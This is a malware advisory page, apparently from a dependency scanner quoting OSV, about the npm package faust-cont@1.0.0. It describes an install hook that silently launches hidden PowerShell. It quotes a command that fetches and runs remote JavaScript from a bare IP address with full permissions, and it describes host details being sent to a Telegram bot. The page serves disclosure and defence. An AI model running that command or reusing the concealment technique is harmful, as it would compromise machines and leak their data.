Logo
npm

faust-cont@1.0.0

Vulnerability report · Last retrieved from osv.dev October 7, 2026 at 2:33 PM UTC

Malicious

OSV ID

MAL-2026-11042

Ecosystem

npm

Summary

The package's npm install lifecycle hook runs install.js, which writes a PowerShell script to %TEMP%\setup.ps1 and launches it via start /min powershell -WindowStyle Hidden -ExecutionPolicy Bypass with windowsHide and detached options. The PowerShell script installs the Deno runtime (via winget/scoop) and then invokes deno run -A http://172.94.9.157/v028f8cde892b0b74c8.js, fetching unpinned JavaScript from a bare IP over plain HTTP and executing it with all Deno permissions on the installer's Windows host. Separately, install.js collects OS name, architecture, and hostname and POSTs them to a hardcoded api.telegram.org bot endpoint (bot token and chat_id constants are blank in this published artifact, but the exfil path is fully wired and fires unconditionally). Hidden-window and detached execution deliberately conceal the dropper from the installing user.

Source: amazon-inspector (6ecd29d4c7b48237d28a9433bcfea361da155e1ed4ebdef265fd661574fe1a5d)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.